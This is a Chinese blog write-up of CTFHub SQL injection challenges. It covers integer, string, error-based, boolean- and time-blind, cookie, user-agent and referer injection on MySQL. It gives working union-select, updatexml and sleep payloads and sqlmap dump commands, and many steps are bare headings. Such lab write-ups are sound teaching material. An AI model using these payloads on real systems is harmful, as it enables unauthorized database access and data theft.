ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入

已于 2024-03-01 21:47:30 修改
阅读量816 收藏 21
点赞数 28
文章标签: sql 数据库
于 2024-03-01 20:40:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80162151/article/details/136385898
版权

整型注入

判断页面是否正常,1=1和1=2是俩个页面

在判断字段数

开始测试回显位置

获得库名

获得库的表

?id=-1 union select 1,table_name from information_schema.tables where table_schema='sqli' --+

获得数据

?id=11 and 1=1 union select 1,concat_ws('>',flag) from flag

字符型注入

查看闭合情况

查看字段数

和整型就一样了,就是多了个闭合

获得库

获得表

?id=-1 union select 1,table_name from information_schema.tables where table_schema='sqli' --+

获得数据

?id=-1' and 1=1 union select 1,concat_ws('>',flag) from flag--+

报错注入

常见报错函数

extractvalue()
updatexml()
floor()
exp()
geometrycollection()
multipoint()
polygon()
multipolygon()
linestring()
multilinestring()
其中原理主要是
xpath 语法错误
BIGINT 等数据类型溢出
count()+rand()+groupby() 导致主键冲突

判断字段数,字段数为2

获得库

?id=-1 and updatexml(1,concat(1,database()),2) --+

获得表

?id=-1 and updatexml(1,(concat(1,(select group_concat(table_name) from information_schema.tables where table_schema ='sqli'))),2)

获得flag

?id=-1 and updatexml(1,(concat(1,(select flag from sqli.flag))),2)

布尔盲注

特点:布尔盲注,结果只有 ture false 两种情况
相关函数
ascii() / ord() 将某个字符串转化为 ascii
语句: select ascii(mid(user(),1));
Lenght() 返回字段 / 结果的长度
语法: select length(user())
count() 聚合函数也称作计数函数,返回查询对象的总数
语法: select count(*) from student;
substr() 此函数是用来截取字符串一部分。
语法: select substr(user(),1,2);
limit 限制查询数
limit 0,1 第一个数据
sqlmap直接跑
判断库名长度
and length(database())=4 --+
慢慢等一会,他有点慢,出现了库名sqli
sqlmap -u url --dbs

获取表名flag

sqlmap -u url -D 库名 --tables

获取内容

sqlmap -u url -D sqli -T columns --dump

时间盲注

相关函数

sleep() 网页延迟 n 秒后,输出结果
if(a,b,c) if 判断句, a 为条件, b c 为执行语句;如果 a 为真就执行 b a 为假就执行 c;
ascii() 函数 /ord() 函数 将某个字符串转化为 ascii
length() 函数 获取字符串的长度
substr()/mid() 函数
时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站 没有错误和正确的页面回显 (完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。当然也需要构 造闭合。
测时间盲注的话直接?id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注
技能树的这些sql,肯定是存在,所以直接sqlmap获取库名
sqlmap -u url --dbs
获取表名
sqlmap -u url -D sqli --tables

获取数据

sqlmap -u url -D sqli -T flag columns --dump

mysql结构

sqlmap跑不出来,说明只能手注了
测试字段数
获取库名
获取表名,发现有俩个表
获取第二个表的字段名
获得数据

cookie注入

抓包,查看是那种类型注入,数字型注入

判断字段数和回显位置

获得库名sqli

获取表名zqfiedhdri

获取目标字段rfbtnrfvhc

获得数据

ua注入

和cookie注入一样,就是输入的地方不一样

抓包,发送到intruder,判断什么类型注入

还是整型注入,判断回显位置

获取库名sqli

获取表名fxzppwgkjn

获取字段名spnvpvyyjw

获取数据

refer注入

如果抓包没有refer的话,手动添加referer

判断类型,判断回显,和上面俩个一样,就不多写了,获取库名

获取表名eedqdazyny

获取字段名nekrgdymxv

获取数据

吕某某
关注
  • 28
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CTFHUB-技能树-Web题-SQL注入-Mysql结构-Cookie注入
Static______的博客
04-05 682
这里其实可以将数据包放入重放器中进行。得到两个表名,查看第一个表的字段。输入1 and 1=1 有回显。输入1 and 1=2 无回显。由此判断可回显字段为1,2字段。
超级SQL注入工具,支持布尔盲注,报错盲注,union注入
03-27
超级SQL注入工具目前支持Bool盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
CTFHub | MySQL结构
尼泊罗河伯的博客
11-13 1821
根据网页显示内容输入1进行测试,此题可能存在 SQL 注入。此题与前一题类似,这次使用手工注入。先判断是否存在注入,发现存在注入后检查注入点。判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看全部数据库名,并查看这些数据库的表名,最后在lvlbiqemvj 表中的数据发现此题 flag 。
CTFHUB-布尔盲注
Web学习之路
03-24 1064
true 与 false
CTFHUB-SQL注入-MySQL结构
最新发布
weixin_68416970的博客
06-13 543
本题用到sqlmap工具,没有sqlmap工具点击直达下载安装使用教程。
CTFHub字符注入
sGanYu
07-24 3120
目录 手动注入 sqlmap注入 手动注入 注入是否为字符注入,在输入id=1的时候发现输出结果为id=’1’,判断类字符串形 需要让语句闭合,正常执行,在url结尾输入%23 或者--+,正常闭合,%23为#,注释后面的语句,一定要注意“ ' ”英文输入下,否则容易爆错 判断列数,发现是两列 库名为sqli 爆出一个news和flag两个表,开始跑列名 列名为flag ,查询列内容 【 Mysql表类:在mysql内自带一个数据库,名...
# CTFhub MySQL结构
plant1234的博客
06-18 735
MySQL结构: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata
防js/sql注入简易工具 v1.1
11-29
【防js/sql注入简易工具 v1.1】是一款专门针对JavaScript和SQL注入攻击的防护工具。此工具的主要目的是为开发者提供一种简便的方式来增强他们的应用程序安全,防止恶意用户通过注入脚本或SQL语句来操控系统。以下是...
防js/sql注入简易工具 v1.0
12-02
【防js/sql注入简易工具 v1.0】是一款旨在帮助开发者防范JavaScript与SQL注入攻击的源码工具。这款工具的设计目标是简化防护过程,让用户能够快速地将其集成到项目中,有效提高系统的安全性。 JavaScript注入(JS...
SQL注入之基于布尔盲注详解
09-10
布尔SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
手工盲注辅助注入工具Blind-SQL-Injector.zip
07-18
3. **多种注入技术**:支持基于时间的和基于布尔的两种盲注方式,以及更复杂的注入策略。 4. **灵活的配置**:用户可以根据目标站点的具体情况调整注入参数,如延迟时间阈值、布尔值判断条件等。 5. **日志记录**...
SQL使用工具sqlmap注入CTFHubmysql结构
zguohuai的博客
05-10 283
使用sqlmap进行数据注入
CTFHub_技能树_WebSQL注入——布尔盲注详细原理讲解_保姆级手把手讲解自动化布尔盲注脚本编写
Ho1aAs‘s Blog
11-19 8030
文章目录前言盲注思路盲注原理盲注常用函数完 前言 布尔盲注,与普通注入的区别在于“盲注”。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功,即:返回查询语句的布尔值。因此,盲注就是穷举试错,由于只有返回的布尔值,往往查询非常复杂,一般使用脚本来穷举试错 盲注思路 由于对数据库的信息了解甚少,盲注需要考虑多种情况,一般思路如下: 爆数据库名长度 根据库名长度爆数据库名 对当前数据库爆数据表数量 根据表数量爆数据表名长度 根据表名长度爆数据表名 对所有数据表爆列数量 根据列数量爆列名长度 根据列
CTFHub | 布尔盲注
尼泊罗河伯的博客
10-29 1806
根据网页显示内容输入1进行测试,此题可能存在 SQL 注入。构造 payload 验证是否属于整数注入,确定此题为整数注入。使用工具 sqlmap 爆出数据库名,查看数据库名中的表发现一个可疑的表名为 flag 。查看 flag 表名的字段为 flag 。检查字段中的数据发现此题 flag 。
CTFHUB-技能树-Web题-SQL注入-Mysql结构-过滤空格
Static______的博客
04-10 501
得到数据库名为sqli,根据当前数据库名得到数据库下的表名。注:%09 %0A %0D +据说也可以替代空格。得到第一张表中的字段名,根据字段名获取数据。由此判断字段数为2(当前表的列数为2)得到两张表名,尝试查看第一张表的数据。
CTFhub布尔盲注
ndjnddjxn的博客
04-12 860
如果目标元素大于/小于中间元素,则在数组大于/小于中间元素的那一半区域查找,然后重复步骤(1)的操作。首先,从数组的中间元素开始搜索,如果该元素正好是目标元素,则搜索过程结束,否则执行下一步。),手工注入比较麻烦,一般使用工具sqlmap,burpsuite辅助,或者使用脚本。返回从下标为from截取长度为length的str子串。提高效率,枚举法,延时法写得脚本,运行出有时花的时间太长。参考高中数学的函数二分法求根,将数据库名切片,循环i次,i是字符下标。输入3,只回显对和错,确定是布尔盲注
CTFHUB-技能树-Web题-SQL注入-Mysql结构-Refer注入
Static______的博客
04-09 1373
HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。用bp抓到包后,将页面中的数据保存到一个txt文件中,用sqlmap爆破(根据reger注入level需要大于三)也就是说,只有当你向浏览器发送请求时,才会带上referer。得到两个表名,第一张表看名字像是自定义的表,尝试爆破第一张表。-p 指定参数,这里为 -p “id”1,2都显示,有两个回显字段。
CTFHub(布尔盲注 判断是否,无回显)
sGanYu
08-06 1998
盲注主要分为两种,一种为时间盲注,一种为布尔盲注 判断是否是布尔的:当一个界面存在注入,但是没有显示位,没有SQL语句执行错误信息,由于布尔注入只会告知是或者不是,所以只能通过页面返回的对与错来进行一个SQL注入 【 column_name:列的名称 Information_schema.columns:表示所有的列的信息 Information_schema:表示所有信息,包括库、表、列 Information_schema.tables:表示所有的表的信息 tabl
CTFHub技能树web(持续更新)--SQL注入--MySQL结构
jiuyongpinyin的博客
09-05 868
MySQL结构 首先结果测试是可以使用联合查询语句的,前文中有提到过如何手工注入,这里就直接使用sqlmap进行注入 爆破当前数据库: 得到当前数据库: 爆破当前数据库的表名: 得到表名: 这里和之前不一样了,没有类似的flag的表名,但是有一个sappimemcd这个没见过的,爆破这个表名的列试试: 得到列名: 接着我们爆破里面的字段: 得到flag: 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正。 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值